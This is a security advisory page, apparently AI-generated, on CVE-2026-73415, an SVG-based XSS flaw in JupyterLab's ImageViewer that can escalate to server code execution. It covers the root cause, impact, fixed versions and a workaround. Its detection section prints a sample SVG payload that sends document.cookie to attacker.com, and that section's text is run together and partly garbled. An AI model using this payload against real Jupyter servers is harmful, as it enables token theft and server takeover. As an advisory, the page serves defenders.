
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-73415 is a Cross-Site Scripting (XSS) vulnerability in JupyterLab's ImageViewer component that can lead to remote code execution (RCE) on the JupyterLab server. The flaw exists in packages/imageviewer/src/widget.ts, where URL.createObjectURL is used to render SVG images and the resulting blob URL is revoked prematurely, allowing a specially crafted SVG to retain an executable same-origin context when opened in a new browser tab. Affected versions include all JupyterLab releases prior to 4.5.10 and versions 4.6.0–4.6.1. The vulnerability was disclosed on July 21, 2026 via a GitHub Security Advisory and assigned CVE-2026-73415 on August 12, 2026. It carries a CVSS v4.0 base score of 7.5 (High) (GitHub Advisory).
The root cause is improper neutralization of user-controlled SVG content during web page generation (CWE-79). JupyterLab's ImageViewer creates a blob URL via URL.createObjectURL for image rendering, but revokes it too early; because SVG files can embed JavaScript and execute within the browser's same-origin context, the prematurely revoked blob URL still allows the SVG's embedded scripts to run when the image is opened in a new browser tab. This effectively bypasses the intended isolation of blob URLs and grants the malicious SVG access to the JupyterLab origin, enabling XSS. Exploitation requires active user interaction — specifically, a victim must open a crafted image file in the JupyterLab image viewer and then open it in a new tab (GitHub Advisory, Security Patches PR).
Successful exploitation allows an attacker to execute arbitrary JavaScript within the JupyterLab origin, which can be escalated to remote code execution on the JupyterLab server. This means an attacker could read or exfiltrate sensitive notebook data, steal authentication tokens, modify server-side files, or execute arbitrary commands on the underlying server — resulting in high confidentiality and integrity impact and low availability impact. In multi-user JupyterHub deployments, a compromised server could potentially be leveraged for lateral movement to other users' environments (GitHub Advisory).
No public proof-of-concept exploit code or in-the-wild exploitation has been reported as of the time of disclosure. The EPSS score is 0.0, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The NVD SSVC assessment classifies exploitation as "none" and the vulnerability as non-automatable, reflecting the requirement for active user interaction (opening a malicious image and then opening it in a new tab) (GitHub Advisory).
<svg xmlns="http://www.w3.org/2000/svg"><script>fetch('https://attacker.com/?c='+document.cookie)</script></svg>) designed to execute within the JupyterLab same-origin context..svg files in shared notebook directories containing embedded <script> tags or JavaScript event handlers (e.g., onload, onerror)./api/contents, /api/terminals) not initiated by normal user workflow.curl, wget) that are not associated with normal notebook kernel activity.Upgrade JupyterLab to version 4.5.10 or 4.6.2 (or later), which contain the patch for this vulnerability (GitHub Advisory, v4.5.x backport PR, v4.6.x backport PR). For users unable to upgrade immediately, the official workaround is to disable the image viewer plugin entirely:
jupyter labextension disable @jupyterlab/imageviewer-extension:pluginConfirm the plugin is disabled with jupyter labextension list. In multi-user deployments, administrators should also ensure the JupyterLab server environment is isolated from user-writable kernel environments to limit the blast radius of any XSS-to-RCE escalation.
The vulnerability was discovered and reported by JupyterLab maintainer krassowski, who also authored the security patches. The fix was part of a coordinated batch of five security advisories released simultaneously on July 21, 2026, with a slight departure from the normal private-fork process due to GitHub infrastructure issues noted in the pull request (Security Patches PR). No significant broader media coverage or notable external researcher commentary has been identified beyond the official GitHub advisory and associated patch PRs.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."